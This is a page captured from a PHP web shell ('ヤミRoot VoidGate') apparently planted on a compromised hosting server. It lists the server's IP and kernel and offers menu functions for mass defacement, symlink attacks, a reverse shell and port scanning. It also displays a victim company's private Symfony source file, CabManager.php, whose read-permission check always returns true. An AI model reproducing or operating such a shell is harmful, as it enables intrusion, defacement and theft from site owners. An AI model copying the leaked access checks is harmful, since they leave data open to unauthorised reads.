ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
src
/
AppBundle
/
Manager
/
Viewing: CabManager.php
<?php namespace AppBundle\Manager; use Doctrine\ORM\EntityManager; use Symfony\Component\HttpKernel\Exception\BadRequestHttpException; use Symfony\Component\HttpKernel\Exception\NotFoundHttpException; use Symfony\Component\HttpKernel\Exception\AccessDeniedHttpException; use Symfony\Component\Security\Core\Authentication\Token\Storage\TokenStorage; use Symfony\Component\Security\Core\Authorization\AuthorizationChecker; use Symfony\Component\HttpFoundation\Request; use AppBundle\Entity\Cab; class CabManager extends AbstractResourceManager { private $tokenStorage; private $authChecker; public function __construct(EntityManager $manager,TokenStorage $tokenStorage, AuthorizationChecker $authChecker) { parent::__construct($manager); $this->tokenStorage = $tokenStorage; $this->authChecker = $authChecker; } public function createCab($cab, $company) { $this->_controlUserWriteRights(); return $this->registerCab($cab, $company, true); } public function updateCab(Cab $cab) { $this->_controlUserWriteRights($cab); return $this->registerCab($cab); } public function deleteCab($cab, $hardDelete = false) { $this->_controlUserWriteRights($cab); $cab->setIsActive(false); if ($hardDelete) $cab->setIsDeleted(true); return $this->registerCab($cab); } public function getCabs($companyId, $minCostPerHour, $maxCostPerHour, $minCostPerDay, $maxCostPerDay, $onlyActiveCabs, $deletedCabs) { $this->_controlUserReadRights(); return $this ->manager ->getRepository('AppBundle:Cab') ->search($companyId, $minCostPerHour, $maxCostPerHour, $minCostPerDay, $maxCostPerDay, $onlyActiveCabs, $deletedCabs); } public function getOneCab($cabId, $includeDeletedCabs = false) { $cab = $this->manager ->getRepository('AppBundle:Cab') ->find($cabId); if (!$cab) throw new NotFoundHttpException('Cab not found: ( with cabId = '.$cabId . ')'); if($includeDeletedCabs == false){ if( $cab->getIsDeleted() == true) throw new NotFoundHttpException('Cab not found: ( with cabId = '.$cabId. ')') ; } return $cab; } public function registerCab($cab, $company = null, $new = false) { if( $new ){ $cab->setCompany($company); $this->manager->persist($cab); } $this->manager->flush(); return $cab; } private function _controlUserWriteRights($cab = null) { if($this->authChecker->isGranted('ROLE_SUPER_ADMIN')) return true; else{ $staff = $this->tokenStorage->getToken()->getUser(); if($cab == null) return true; //in case the Company Admin is creating a new cab entity if( $staff->getCompany() == $cab->getCompany() ) return true; else throw new AccessDeniedHttpException('Access denied. Not allowed to access the resource.'); if( $cab->getIsDeleted()) throw new NotFoundHttpException('Cab not found: ( with cabId = '.$cab->getCabId(). ')') ; } } private function _controlUserReadRights($cab = null) { return true; } }
Coded With 💗 by
0x6ick